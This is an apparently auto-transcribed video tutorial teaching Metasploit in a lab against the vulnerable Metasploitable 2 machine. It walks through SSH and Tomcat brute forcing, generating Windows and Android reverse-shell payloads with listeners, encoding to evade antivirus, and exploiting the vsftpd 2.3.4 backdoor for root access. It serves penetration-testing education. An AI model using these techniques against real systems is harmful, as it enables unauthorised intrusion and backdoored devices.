Hello everyone. I hope everyone doing well. I'm super excited to meet you all with another interesting video. In this video, I'm going to teach you how to use Metasploit framework in a structured and intuitive manner. This free online ethical hacking course makes a wonderful quick reference for penetester, red team and other security professional. Metasploit definition, basic Metasploit commands, Metasploit module, I'll be explaining it. So there are various Metasploit modules are available. So we're going to talk about the purpose of it in this one. And once we are done with the Metasploit module, I have explained it. I'm going to show an example how you can use the Metasploit on performing SSH boot force and attacking a Tomcat with Metasploit. And I'll be showing you how to create a Windows and Android payload and how to create a reverse shell listener. Once you create a payload, you need to get the reverse shell kind of thing access so that you can, it's a kind of a backdoor access. So I'll be showing how to do that one and automate the testing the process. I'll be showing on it, and we will be hacking the server with Metasploit. And finally, we will be ending this session with Metasploit QE, because whatever the actions we are going to perform here, it is all command line here. So if you're a beginner, you doesn't know how to do this, so this Metasploit GUI interface will be giving a more easy to make your as a beginner, it will be easier for you to do it. So that is why I'm doing on it. So before get into the video, I would request to subscribe the channel if you are watching my video for the first time and or new to the channel. I'm a Frederick, founder of Beaver Academy, and my goal is to provide a quality cybersecurity training in the free of cost, which help the people in building the career in cybersecurity field. Without further delay, let's get into the video. This course is a perfect starting point for information security professional and student who want to learn penetration testing and ethical hacking. Disclaimer: this video is only for educational purpose. Use this information at your own risk. Do not use this information for any malicious or illegal purpose. This channel or me is not responsible for it. Metasploit definition. Metasploit is a widely used penetration tool. So basically this is available, it's available in all the Linux platform. For example, if you are using a Ubuntu Debian family, you can go to the website, Metasploit Framework website, and you can download, you can install it. Or it comes with a pre-installed package for a Kali Linux and Parrot OS. So if you are familiar with the Kali's and Parrot Linux systems, so already you know this framework Metasploit is available in that one. You no need to install over there. This is a hacking way easier than used to be. It makes the hacking very easier. It has become an indivisible tool for both red team and blue team. It is a penetration testing framework that makes the hacking very simple. It is also an essential tool for many attacker and defender. The complete process now automated, like information gathering, gaining access, maintaining the persistence, evading detections. Metasploit is a basically hacker Swiss Army chainsaw. The Metasploit framework is both free, it's a completely free, and library software comes with a pre-installed in a Kali Linux, as I said. So you doesn't know how to install Metasploit frameworks, you no need to worry about it. All you need is just download the Kali VirtualBox and import it. So it's already pre-programmed Metasploit framework, so it's very good. So most of the Metasploit scripts are written in Ruby. Ruby is one of the famous language. So it's a kind of a Python and those C, C++, Java kind of thing. But most of the scripts available in the Metasploit is written in the Ruby. So now let's see the basic Metasploit commands. So to start Metasploit framework, I'm in a Kali Linux. So as I said, it is already pre-installed. So only thing is to start Metasploit, sudo msf console -q you can give it, because this will quit the banner and directly take you thus. So let me enter and it will prompt for the password. Okay, so the Metasploit console is open. So now you can do is just type a help. You can see the commands, like it will show you like how to sessions, those things and all will be giving all the informations. You can see like it have edit, log, preload the library, time, credits, workspace. You can create a workspace. For example, you are just instead of opening a two MSF console, you create a database workspace so that you can switch it between again there. So you can see all the vulnerabilities, all the services are running. Even you can take the notes if you some things. It comes with again, as I said, you can do a information gathering from Metasploit framework itself. So you can analyze it. You can even it comes with the Nmap. You can perform it. So there are a lot of things commands are available here. Okay. So one more thing is yes, search option is very important one. So to search the payload, it comes with a lot of scripts over there. So you to be a very specifically, you have to search it, search and Windows. It will give me all the searches related to the Windows. It will be giving on it. So if I want to specifically search something else, this will help me on it. So for example, I want to search payload, kind of a type payload, and or we can see what options are available in the help. Means using the help search option, we can see what options are there in the, we can see it on it. So search help, you can see that. So you can search for a CV number. It can be a C module. You can give it like type is exploit platform, which platform you can give it, whether it is a Windows or Linux or Android, you can give it, or specifically you can search for a CV numbers based it on it. So you can do a lot of searches over there. Even you can search with the descriptions, even you can search with the rankings. So those factors you can give it on it, or when it is published. So those things are there. So anyway, we are going to talk about more when we are searching or doing. So you don't need to worry about it. But these are the basics commands to understand. These are the commands are available. Again, so to clear, you can give a clear. So for example, Windows, I'm just searching for a payload, search Windows, and it will list all the payloads. And for example, let me maximize it. And let me again search for it. Okay, so you can see that this is again, this gives me all the options, searching Windows related keywords, it be searching and giving me it. So you can see this is the ranking. So there is a excellent, normal, great. So this is the ranking, how this exploit will work, whether it is work condition. If it is a normal, it sometimes it works, sometimes not work. Excellent means it's 100% it will work. So based on the ranking, based on the uh, uh, of recommendations, this ranking will be available. So if I want to use some payload, for example, if I just want to use this payload, so what I need to do is either I can copy the complete one and I paste it along with the command to use, or I can use the number of this one. So in my case, number, I'm just using it 1827. Let me copy this selection and let me scroll down all the way down to the MSF console. Let me clear it and use, I'm just pasting the value. Okay, so the payload is there. Using show options, you can see what are the parameters you need to set it for this payload to be executed. So show option, you can use it. Or if you want to know what is this about it, you can type info. This will give you more idea about it. What is this module will be performing it, what is the references, those things, and what kind of options, payloads options you have to set it, and whether it is target. See, you can see this is the target missions. You can target for the Windows Vista 7 2008 servers. So this will give you more idea about it, who developed this product, the ranking and everything. So using this info command, you can get this information. If you want to go back to this, just type a back command. It will take you to the again, you can search for the payloads and you can put it on it. If you type exit, it will completely exit from the console. Okay, so these are the commands, and you can use a clear command to clear everything so that your screens will be more visible and those things as well. So now what we will see is, let me open a new tab and try to see what are the modules are available in the one. So to see the modules, let's go to this part, cd user share Metasploit framework modules and ls. You can see these are the modules are there. auxiliary, encoder, evasion, exploit, NOPS, payload, post. So auxiliary is basically a scanning. It says the module used for finding the exploits of vulnerabilities and delivering the payloads, like remote exploits, local exploits, privilege escalations, client-side web applications related, or even you can key all the information gathering related like scanners. Everything will be there in this module. Encoder. So basically encoders, what you'll do is it will encode your payloads like with the bash 64s, or it can be comes with the more options, so that you can encode the payload from your I means just hiding the string values, hiding the hash values. So using these encoders you can encode the payloads, everything. Evasion is basically using this evasions, you can uh, compress it so that you can bypass the antivirus with this. Using this payloads options you can bypass it. So this have a compression and decompression sourcings. Using this one you can do it on it. So exploits, again, exploits have a more payloads will be there. So you can use this, for example, if I want to execute a payload on Windows, reverse shells or something else, so from here you can use this one. Okay, so NOPS is a model, is like a harmless begin, for padding purpose, like memory kind of exploitations. So that's where you can do it on it. So payloads is completely exploits, like having the exploits like Metasploit sessions, reverse shell, executing a commands in a PowerShells, and those commands, or downloading or executing the commands. You can do more, like a payloads can be a stage wise or non-stage wise, you can do it on it. Okay, so post is the something, modules for post exploitations. So after you are exploiting it, so it will help you in like dumping, credential harvesting it, hash dumping, local privilege escalations, backdoor, creating a backdoor. So after the attack has happened, post that means after the attack, to persistent the connection, you can use this modules to do it on it. Okay, so these are the modules are available. So once we start experimenting it, you will get a more knowledge. But if for example, if I want to do information gathering, you can use auxiliary. So if I put it in the MITRE framework or hacking phase, so information gathering or reconnaissance, so you can use this auxiliary. Once you are you need to create a payload. So payloads, and using this encoder evasions techniques, so that you can compress your strings values and you can bypass the things. Once your payload is ready, you can exploit it. Once the exploit is done, then you can do, using this payload, again you can do a privilege escalations. Then once the privilege is done, you can obtain a backdoor access, maintain the access of it. Okay, so these are the things, if I put it in the hacking phases or MITRE attack frameworks, so these are the payloads will be, modules will be available on the Metasploit framework. So let's go back to the PPT. So we done with the Metasploit definition. We saw basic Metasploit commands, and I have explained the Metasploit modules also. If you still have any queries or doubt, please feel free to comment on the below this video. I'll try to address it as quicker as possible on your modules and those things. Okay, so SSH boot force, sorry, my bad, SSH boot force with Metasploit. So now what I'll do is I'm going to show how you can perform a SSH boot force with the Metasploit. To do that, what I actually, there is a VM. So this is a Metasploit table 2, which is a completely a vulnerable mission. The mission actually created for to perform this kind of testings, to practice and those things and also. So please ensure never expose this VM to an untrusted network. You can download this machine from Nmap. I'll be giving the link in the description. You can download it, but whenever you are just hosting, please ensure it is not available in the production network, and don't put it in the untrusted networks, because this is a completely a vulnerable shell. So this is going to be a risky factor. So please handle with the care of it. So to log in with this Metasploit framework, you can use this MSF admin, and the password is MSF admin. Okay, so let me clear it, and let me do a fconf. and this is the IP address of this machine 172.16.0.6. So what I need to do is, let me go back to the Kali machine, then we will start. Okay, so now what I need to do is, let me close this one, and yeah, before this one, let me check my IP address. So you can see this is in a same network. So the Metasploit machine is 172.16.0.5. My Kali machine is 172.16.0.5. Okay, that is 6, this is 5, just next to mission. So let me go to the thing. So first of all, as thing, we have to gather information. So to information gathering, so I need to know, like I need to run an Nmap. So basically I want to understand what kind of port number is using, what services are running, what is the versions over there. So to do that, first of all, I need to run an Nmap command, Nmap SV. So even you can run the Nmap separately, or you can run it in the Metasploit console itself, framework itself. This will be handy when it comes to if you are using the Metasploit framework in the Windows environment, because you don't need to use a multiple tools for information gathering. One tool will help you to do all your process in an automated way. So that is why this is the tool is very handy over there. So Nmap SV 172.16.0.6. If you're not familiar with Nmap, what is this Nmap or how to utilize this Nmap, I have already made a crash course. So please check this video. This is a complete beginner to advanced to a beginner to advanced. So that this is, I'll showed in this video how to use the Nmap on your port scannings, informations, how you do a stealth scanning basis, how attackers are doing scannings, anonymous, everything I have put it over there. This is a very good, interesting course. So I recommended to go with this. If you are a beginner, if you doesn't know what is Nmap, does it. So please go with it. I'll be giving the link in the description, or you can see this link in the title card of it. So yeah. So let's go and quickly run this one, Nmap SV. So what I'm going to do is, I'm just going to version of this, what are the services are running over there on this machine. So let me give an enter, and you can see the Nmap scan is started. So let's wait for some more time to get this scanning to get complete. Okay, so that you can see that Nmap scan is done. So you can see that there are a lot of services are running on this one. Okay, and one more thing is, as per information gathering, I just understood this is a Linux machine, and it is a Linux kernel also running, and these are the services like Tomcat is there, and I see that SSH is there, and FTP also there. Okay, so now in our case, I just want to try to hack SSH service. So what I need to do is, let me search and use a type. So here I'm just going to use a type called auxiliary, because I want to scan it, more information on it. So I need to do a information gathering on it. Okay, so let's go back to the module and let's see ls. So copy this module. Let me go back here, type, I'm just pasting the clipboard, auxiliary, and platform. So platform is Linux. If you apart from that, you want to know all apart from the Linux, what you can do is, you can, so for example, I need to exclude Linux items. So you can add a minus and Linux added, it will exclude on it. But in my case, I want to specifically, I want to know Linux only. Okay, and one more thing is, I want to search the payload. What I'm going to search is SSH. Okay, search SSH, enter. So what this will do is, this will give me all the search results with SSH. You can see it will give me a related informations over there. Okay, so what I can do is, let me see, if I do minus, let me see more informations will be getting over there. You can see this will exclude everything, complete platform Linux, but it will give you all the SSH on the auxiliary. Okay, so for example, I want to know more about it, like what version is, you can see descriptions are there, ranking is there, when it is was means disclosure, everything will be there. So if I want to know versions, for example, as I said, this is also one more scanner. So I need to know more details of my SSH information gathering. So what I can do is use 20. So this will so it will give me a more version about it, what this version of SSH version is are doing on it. So this is basically a scanner. So I'm going to try it. So use 20. I'm inside it, show option. So I have to fill the options for like a, so you can see R host. So here I need to give the target host, and R port what I seen is 22 only. It is not changed. So now what I need to do is set command. Set is the command. You have to set R host. IP address of this machine is 172.16.0.6 and enter. And again, we will run a show options to ensure the data what I updated is there. So you can see this earlier it's a blank, but after setting it, this is done. So to execute this command, I can use a run, or I can use a command called exploit. Okay, so I'm just familiar with this command, so I'm just running this one. So what this will do is, using this payload or using this auxiliary scanner, this will scan that machine and give me the data of it. You can see the scanning was completed. So the SSH version server is SSH 2.2 and OpenSSH 4.1 Debian. It's a Ubuntu, so it's giving you more information about it. So you can see it gives me a more information over there. Okay, so yeah, as much as possible, according to the hacking, as much as possible you collect the information about the target. It will be easy for you to focus what kind of payload is required, how are you going to achieve. The plan will be getting more clarity on over there. So let me clear it and back command, and let me use the search command. Okay, so now what I need to do is I'm just going to do a brute force attack. So to do a brute force attack, so you can see that auxiliary scanner SSH num user. Okay, so I can use this one, or let's see if there is anything like any other SSH related login check scanner is there. So this is just like a login check. So this is the brute force one. So this is like a user enumeration. What are kind of users available? You can do a brute force, and again you can get those information. So what I'll do is I'll use this scanner, use 15. So use 15 payload. Okay, now again let me use show options, and so you can see that the bank password, don't try a blank password, because I'm pretty sure nobody will set a blank password. The brute force, sorry, my bad, brute force speed is 5, so that you're giving a time how fast this brute force attacks has to be happen, you're giving on it. So that is what you're in. And even you can give the password files where it is contained, those things you need to set a R host port, you can leave it, stop the on successful. So when you got the password, so the attack will be stopping over there, so it will not furthermore continue. Even you can give a set of file. For example, I don't have a specific password, I have a specific file contains like a username and password, like a word list. I can give the path here, then it will do it over there. So let's go and quickly try it over there. Before that, I'll just give a slight introduction about brute force. Brute force is a famous password attack kind of things. What we'll do is, I know this is a username, or this is a password, or this is a combination you'll be trying password. So based on that, I'm just trying to guess. It can be a dictionary based attack, or it can be a guessing, password guessings over there. So the combination, multiple combinations I'll be trying till the passwords I'll get it, combinations get I access over there. So that is the brute force attacks. So what I'll do is, first of all, let me set a R host. So to set a R host, set R host 172.16.0.6, enter, and let me again go to show options. Okay, so the R value is done. So I need to give us set stop success is true, so that once this is done, it will be true. And anything else I need to set it? Yes, one more thing is I need to set a user path file. So Kali is good thing is Kali comes with the word list. So let me clear it and go to the CD. Let me clear. So you can see that. Let me go to the path, CD user share word list. So Kali comes with a word list. So you can create a one thing, or you can try your word list from here. So what I'm going to do is to make this demo very easier and faster way. So I'm going to use this existing one. So what I can do is, let me go to cd metasploit one and word list. And what I can try is, let me see if anything is simple way, so which again so that the demos will be more successful and you can get a more understanding over there. Because my intention is not going to hack this or finding the password. I'm just going to show you how you can perform a SSH brute force attack from the uh, Metasploit framework. Okay, so here you can give this, I can copy this one. Okay, so what I can do is, let me do a PWT. Let me go to this one. So set user. So Linux have a case sensitive, so that is why you need to be more cautious on when you user pass file. So here user share word list Metasploit. Okay, and name the file what you're giving is, this is the root name, username, password. Okay, let me paste it here, paste it to clipboard, enter. Okay, show options. So let's see, everything is there. So what we'll do is, yeah, you can see that we just changed the R host, port number is 22, we're not doing it, and we gave the path contain like username, passwords. So it will it will try from the username and password from here only. So what I'll do is, yeah, so one more thing is, I want to see the atoms. So what I'll do is set the verbose to true, so that the whatever the actions are happening, you will able to see it. Let me run it. So you can see this, it is again, see there is a root, it's trying with the different combinations. It's the root username is root, password is trying Cisco, again trying with the root and trying with the password next, root admin. So different combinations is trying to seeing on the brute force attacks over there. If it is successful, what will do, the password, the if the brute force was successful, it give me the in the green color, and attack will be stops. So but again, it will take a lot of time because it's not a easy task, because the different combinations, it will be keep trying on it. But I hope you guys understand the idea about it, how you can perform a SSH brute force attack from the Metasploit framework itself. Okay, so let me stop it. To stop this one, Control C. So that is the best thing. You can see I have interrupted and those things. So let me go back to the MSF console and clear this one. So this is how you can do perform a SSH based brute force attacks over there. So okay, so we have successfully performed a brute force attack with Metasploit. So now what I will do is, I'm just going to attack a Tomcat with the same thing, Metasploit framework. So I'll going to show you how we can do it over there. Okay, so let's go back to the Kali, and again same nmap SV 172.116.0.6. Okay, so now I need to understand where this Tomcat service is running, which port number. So again, information is gathering, because if I want to do a right brute force attack or right attack, I need to know these things as well. Because if I am trying in a different port number which is not available, also my attack will not be successful. So you can see this one. So there is a Tomcat service is running on 8180. So you can see Tomcat service is running. So let me go back to, let me open a browser to confirm that one. Okay, so let me go HTTP 172.16.0.6 and port number is 80, I believe 8180, sorry, 8180. Okay, so you can see that the Tomcat service is running over there. So if I want to try Tomcat administrator, okay, so if I'm clicking at Tomcat administrator, it will be prompting for the username and password. But what I need to do is, I need to I need to get those success, or I need to know the passwords. Once I go in, I can do a number of modifications or those things I can do it on it. So let's see how we can do that thing. So what I need to do is let me clear it. Let me clear that one. And again, we will use a module search Tomcat. Okay. And type is, I'm not giving a type, but platform I'm just giving is Linux. Or let me just search for a Tomcat and see what is coming over there. Okay, so even if you want to see for this one, you can see like this is a post. So after some you are just getting it, you want to see what is the gathering of Tomcat credential. So you can do it on it, or even you can enumerate. Even exploit is there. Even you can perform DOS attack on this one. So there are a lot of options are there. So what we will do is let's try to get the Tomcat scanner enumerations and we will see it on it. So just this is demo one. So that what we will see is or we can see like post. This is a gather of the information. So okay, let's go and try this payload, which is option is 9. So to do that, use 9. Payload is done. Show option. Okay, so I'm just giving the same thing. I'm not touching here DB credentials, and I'm not touching anything, so I'm just leaving as it is. So our host I have to set, and the port number I have to set, and targeted URL I need to give the page your Tomcat URL where it need to try. And good thing is it comes with a file, again contain usernames and everything, passwords are there, so I don't need to give a thing, and Verbro is also printed over there. So let's go and quickly set our host. So 172.16.0.6 and set our port 8180. Okay, and target URL, set target URL. Let me go to here and copy this page. Let me paste this to clipboard. Okay, enter. Okay, let me quickly verify everything is updated or not. Show option. So you can see that I have set it our port is done, our host is done, the path of the page administrator is done, Verb is already set as 2. So what I'll do is let me go and quickly run this one. So this is again, it's trying with all the combinations. So if you can see that if the file is able to find the username, it will give you on it. If it is not there, it says that yeah, auxiliary mode execution is completed, but unable to find anything over there. You can try with a different word list, you can do it on it, but this is how you can attack. Once you got the username and password, you can go back and you can log in over there in the page. For example, here I can give admin. Okay, yeah, so this is comes in like invalid password names. Yeah, but this is a guessing. So using that payload or using your different options or using a different word list, you can find the username and password. Once you find the username and password, you can again you can try, or you can use a different payloads options as well. Okay, so the attacking the Tomcat with the Metasploit is also I have showed you. So now we will see how to create a Windows and Android payload. Then followed by we will see how to create a listener after this payload is created. Okay, so to do that, let's go to the Kali. Okay, so to do the creations, what I need to do is I need to create a payload. So I need to use a MSF menu. So I have already tried to create in my previous site. That is why you are able to see all this names over there. So yeah, so MSF kernel and the payload what I'm going to create is Metasploit. So if you're not sure about if you how to this, you can create a search type payload. or you can put it search Metapreter. Okay, and the type is payload, platform, Windows. So this what will do is this will search the Metapretas. So you can see this, the Metapretas collection. So you can see this payload, Windows 64, Metaplot, reverse shell you can. So what you can do is you can, if you are very familiar on this payload versions, and you can create a in this way, Windows x64. I can copy this one completely. Sorry, this one I'll copy this one. Okay, copy, and let me go back to this one, paste this one, and lhost, which is our case is Kali Linux 172.16.0.5, and the listening port I need to listen on 1234. Okay, and the output where I need to save this file is into home Frederick desktop, and the file name is test1.exe. Okay, so if I click this one, this will be generating a payload. I think I have missed something else. Okay, so yeah, so what I need to do is this, oh, I gave a 0, my bad, sorry. So you can see this is a payload is creating. So even you can create a payload in this way as well. Then once you can create it, you can do it on it, or what you can do is here also you can use it. So here the payload option is 132. So use 132 show option. Okay, so here you need to set the L host. So set L host, okay, which is 172.16.0.5, and L port number, you can change the port number as you wish. In my case 1234. Okay, and again give a show option, and once I ran it, it will give me the execution over there. Okay, so you have to use a command called generate. So these are the options are available in the generate. So for example, you can generate what it is, you can do it, it has a Python or whatever, you can do it. So in my case, I'm just generate output as exe. You can see this one, even you can use encoder or whatever, you can see the output format. You can have a various workflow formats are there. So what you can do is yes, what I wanted is exe. So let me generate output is exe. Okay, my bad. So what I need to do is exe, and output file, same thing, output file, I need to give a same thing. So in this my case, same thing, home Frederick desktop and test2.exe. Okay, so let me generate this one. So the payload is generating over there, and yeah, it seems like the payload was created, you can see. So what I'm generating here, it is generating, so you can see generated 2. So payload 2 is created. So this is how you can create a payload using MSF console. You can use this way, MSF Venom, you can use it if you are a little know about how to do it on it, or if you completely want to try it from the Metasploit framework itself, you can do it on it. So let's me clear it. Okay, so I'll show you how to create a Android payload. So you have to use a search reverse shell reverse platform Android. Okay, so this will search for the reverse connections and give you the payload, which is an Android. So I'm just going to try this one. There are a lot of options are you there, you can play around it. So use to show option. So I need to set L host 172. Okay, so the already L host I have set it. So this is what there. So this is the L host I have set at 172.16.0. And port number is I'm using 1234. So you can see this. This is internally I'm just trying to the internal between the lab. So that is why I'm giving a private IP address. But there will be some people will be having a question like how if for example the device over the internet, how I can hack it over there. So please watch this video. In this video I have showed you how you can perform attack hacking over the internet using ngrok. Ngrok is a reverse proxy connection. So I have talked about more in detail about this. So please check out this one. Okay. So once you are done, you just enter the so the payload is done. So let me clear this. So to generate the payload, generate -, raw format, and output is home, and I'm just saving the file in this path, Android underscore payload.apk. Okay, so if you see this one, so you can see this, I have successfully created the payload. So I have cleared the payloads, but now if victim is clicking this payload, this APK or EXCS, so how I'm going to get the reverse shell and how I going to gain the access over there? So for that, we have to create a reverse shell listener. So to do that, so it's very simple. Say in the MSF console, use multi-handler. Okay, and you can set the payload, same thing. You can give this is the Android we have created. So copy, set payload, and click this one, paste this clipboard. Okay, show option, and you can see the L port, same thing, L host is it. So I have already predefined, that's why you are able to see this one, but in reality you have to set the L host and L port over there. So once you are done, you can go and let me clear it, just run it. This is actually this port number is available, that is why you are seeing it. So for example, if I use in a stat -a and this grep, right, you can see it's already listening over there. So if I am just executing anything, this automatically the connections will get on. Or you can better, my suggestion is, if suppose anything is running, just kill this network, and you can rerun it, or you can change the port number or reboot the Kali. Automatically the ports, everything will be get closed over there. So you can do it on it. So this is how you can create a reverse shell. So once the reverse shell is created and ready for the listening, so yeah, so what I'll do, let me 1 minute to make it. Now what I'll do, show option. So let me set the L port into 1 2 3 4 5. Okay, and let me run it. So for your understanding, I'm just doing this one. So you can see this will be started reverse shell TCP handler. Once the victim open it, it will be the connection will be established. But just ensure the IP address, the port number should be same what you created, what you given in the payload itself, because otherwise your connection will not get established. So for example, if you used 1 2 3 here 4, you have to use the 1 2 3 4 itself, because this is where the machine going to communicate on this machine over there on the same port and IP address. So you have to be more conscious on this part. Okay, so this is how you can create a reverse shell things. So I'm just going to show now, instead of this, it's for example, if you are a penetration tester, red team, you no need to go through on maybe your BAU task is or daily routine things. To save us time factor, you can automate these things rather than you are doing everything over there, repeatedly go into MSF console and those practices. So what you can do is, all you need to do is you need to create a RC file. So in my case, I have already, but I'll show you now things. So this RC file, if you see that I have already created a payload for the Windows. So 1 minute, let me log in. So you can see this, I have same thing, only thing is use the payload. So I have given the payload, which is Metasploiter, set our host, and the same thing, I'm just giving a set L port 1235, set the staging encoding should be 2, and output, I'm just same thing, generate this one, and output should be this file, and let me save this file, Control O, enter, exit. Okay, so to start this file, what you need to do is sudo msf console -r Windows RC. So what this will do is same procedure what we did it, right? So we just use this option, set those parameters, set the output and everything. So this will again automated. You no need to do everything. So all you just need to come back and execute this file. So just give a enter. This will do it on it. So let it go it on it. So in meantime, what I'll do, I'll show you how to create for Android. Okay, Android payload RC. Okay, so set payload, it is Android Metasploiter reverse TCP set L host 172.16.0.5 set L port 123456. Okay, and generate hyphen raw O path is home, Frederick desktop Android auto payload.apk. Okay, and let me save this file, exit. If you see this one, the file is saved. Let me clear it, sudo msf console -r Android payload RC. So let's go see. You can see this. This is starting the Metasploit framework. Then it will automatically put the values and the payload will be created. And in some time you will be seeing that values are here. Okay. So this is, you can all this, it's a kind of a script kind of thing. So it's make your life easier. So what I'll do is, again, let me, what I'll do is, I'm just starting over there, right? So what I do, I'll try to create a one more reversal listener. So even you can do the same thing on listening part also. You don't need to run once the payload is generated, you can run this automatically. So same thing, let me go to cd desktop, cd automate script ls. So now I'm creating a listener, sudo nano Windows listener. I'm creating Windows -listener .rc, enter. So now what I need to do is, so I need to create a listener, use multi-handler, okay, and set payload Windows Metasploiter. Since I'm using a reversal for Windows, Metasploiter reverse TCP set L host is 172.16.0.5, set L port is 12345, and run. Okay, so, or you can put it like set exit on session false, exploit set. Okay, so this is again, which goes the things. So let me save this file, enter, exit. So now if I create it, you can see this file. So same thing, if I want to write sudo msf console -r Windows listener RC. So this is how you can automate, so that you don't need to type everything. So you have to just dear it, You can use the encoders, you can use those points accordingly. Then you can do it over there. Once you exploits are there, you can run this and the listener will be ready over there. Okay, so this is how you can automate. I'm just showing a fundamental of this one, but still you can go back and you can customize your automation scripts and over there accordingly. Run this RC and you will automatically payloads will be generated. So you don't need to every time you need to go to MSF consoles and create a 1.9. This is automated one. It will makes your life easier in the penetration testings over there. Okay, so now I'm just going to show how you can hack a web server using Metasploit framework. So first step, use an Nmap and let me do an aggressive scan of the mission 172.16.0.6. Let me run the scan and we will try to get the result over there. Okay, so the scanning is completed. So when you use aggressive, it will go more retail and give you more version. And if there is any exploits or those there, that details also will be, it's a kind of a script based thing. So that's what you can see this one. When I run it, this will allow the anonymously I can log in. So basically if you're not configured properly FTP and anyone anonymously can allow in login over there. So I can use this exploit and I can get into the mission over there. So it's simple. So I'll just show you how to do this one. So you can see this one, this version is VST 2.3.4. So let me copy this and let me search. Let me maximize this one and let me go back to the thing. Search and paste this version and search for it. Okay, so you can see this is the executions, this there, exploit is there and it is excellent. So let me use 0, show options. So yeah, now show options and all I need to set the rhost, set rhost, which is 172.16.0.6 and the port number is same. So I no need to touch anything over there. And I need to set the payload. So what I need to do is I'll set the payload reverse shell payload, or I can leave it as it is, or like, yeah. So for example, I need to give options like command M or Unix or interactives over there. So what I can do is one more thing is it can give the option. So show payloads. Okay, so this will show me all the payloads. Okay, so again I'll use the set 0. So the payload is again set it over there. So let me show option. You can see it's all good to go. So let me run and you can see the back door is open and I'm fine, the shell is there. So in some time I'll get the access of that machine. So you can see the connection was established. So if I looked at PS, it says all this PWT uname -a. You can see I'm inside this Metasploit table over there. So even I can, so this is how I can gain the access. So that is why we always says that, see, this will help you in searching the vulnerabilities. Already the payloads are available, executables are there, easily you can gain access of it. So this is how you can use the Metasploit framework, this is how you can use the Metasploit framework and hack any machines over there. So now I can see I hacked it over there. So let me, if I do ls, it give me like all the file. Let me want to go to cd root folder, cd root ls. I'm inside the root folder as well. So this is simple. The machine is simple. The Metasploit framework table 2 is simple. That is why I'm able to crack it. For this. Again, I chosen this one because for the demo. But yeah, but ideally you get the picture. Like using the Metasploit framework, you can generate the payload, you can scan it, information gatherer, you can automate everything. This is a very, very important tool in your penetrations, red dream, or if you are a professional cybersecurity professionals over there. Okay, so I hope you got the point. So let me Control C and let me abort this session. So I just quitting it on it. Let me clear and okay. So the payload is set it. So I have showed you what is the definition of Metasploit. Basic Metasploit commands I showed you. Metasploit modules also I explained it. And I showed you SSH brute force attacks, attacking a Tomcat, and I showed you how to create a Windows and Android payload, how you can create a reverse listener, and how you can create a automation testing scripts process and everything. You can do it on it. Even I have hacked the server with the Metasploit. So finally, I'm just going to end the session with Metasploit GUI. So I'm just going to show you how you can create a Metasploit in a GUI based one. So Cage is the tool which comes from it's a designed it, and it is the developer who developed this 0xOR Cage. So these are it is available in a GitHub. I'll be giving the link in the description. Okay, so what you need to do is you just need to come here in this GitHub. I'll be giving the link in the description. So what you need to do is you can go to install this Cage binary. You just click here. It will take you to the binary pages. So you have to if you are using in a Kali, you have to download from this one, or if you are using in a Windows based one, you can download this exe. So click this one. I have already downloaded. So you can see, let me go to this directory and open a terminal. Right click, open a terminal here, and what you need to do is, let me minimize this one. Okay, so ls, let me give a full permission to this one, chmod executable Cage. Okay, then the file will be executable. Now I need to run. So now if I give ls, the color was changed, so now it is execute. So sudo /cage execute. So this is stays that integrated kind of thing. Yes, I'm just giving s. So this will install. If anything is dependencies or anything is there, it will get installed over there. So you don't need to worry about it. So let me close this all the terminals so that it will be more visible for you guys. So now let's go and run this one. So run it as without sudo and enter. Script will be started. So let me keep it aside. Okay. So now the flame, you have to connect to the Metasploit RC. So we have to put the username and password. You can click the start the server and you can connect on it. But I'll show you how to do it. Instead of this one, we can do command line. So first of all, you need to go to MSF console. Use the command called load msgrpc and you will get the username and password. So type username and password. F8, you can copy paste. Let me copy it. So I have copy pasted links. If you click connect, it will connect. If it is prompting for some network error, it says like, if just check if it is MSP is running or not there. That if you're getting any network error, just say if the DB is status in the MS console filter, it should say it should be connected. If you are seeing anything like such a thing like post selected no connection, what you have to do is, first of all, you need to go and you have to run this command sudo msp db initiate. So this what will do is it create a database, it will create everything configurations, everything is there. Once this is done, what you need to do is then you have to come back and you have to run this command sudo service postgres sql start. And once it is done, you just see the status whether it is running or not. Then open a MS console, new console, because we have just reset a service, right? If you are trying in the existing one, it won't work. So you have to open a new one and again put the DB status and see. See, for now you can see it's connected to the MS webs and the connection time is it's okay. So now if I click connect, it will work. And ensure you just remove this one because you're just a local host connection. It is not HTTP. So that you have to be very cautious. You have to uncheck, then connect. Yeah, so now we have successfully connected over there. What I'll do, let me minimize and just maximize this one. So what you can do is you can create a payload. So all you can just scroll here. It's easy for you to search the payloads, reverse shell. I am creating a Android Metasploit TCP1. The host name I can give it as 172.16.0.5, and the port number is, I'm just giving 1234. Okay, and even you can give options like enable context encoding or exit on section. You can give it whatever things. Okay, uh, payload is required, so this is done. So yeah, so you can select this one. Payload will be created, and even you can create a generate. So you can see the format, you can put it again payload, whatever the extension you wanted. For example, I want to put, see, even it is open a multiple reverse means handler also open. So now I need to create as apk dot apk cage dot apk, sorry, cage.apk. I'll put it as a cage.apk, and the payload as I'm just keeping as it is. I'm just keeping a reverse shell, so I'm just generating. So the job is open. So job is basically you are creating a listener over there. So that is what is done. Now we have to create a payload. So 172.16. Same thing as I said. All the whatever the details you are giving, it should be same thing. 1 2 3 4. Okay. The format what I'm just giving is raw, and encoder, if you want any encoder you can use it as it is. You can even, you can, it's optional. So what you can do is just generate. So the you can see the output is home Frederick cage apk, the file will be there. So you can copy and you can give it on it. So one more advantage is once the sessions are open, you can even, you can multiple sessions are open, you can switch it easily, you can do it over there. And it's a very handy tool, you can use it over there. So this is the how you can utilize the cage, you interacting with the Metasploit in a GUI based. Thank you all. I hope you guys enjoy the tutorial, and if you think video is useful, please consider subscribing the channel and help in the channel growth. Please share your feedbacks, comments, suggestions via Telegram, Discord, or if you have any queries, feel free to comment below this video. For the channel updates, please follow me on Telegram and LinkedIn. The links, I'll be giving the link in the description. Please check in the links. Thank you all for watching this video. Bye for now. See you soon with another interesting video. Thank you. Bye. Take care.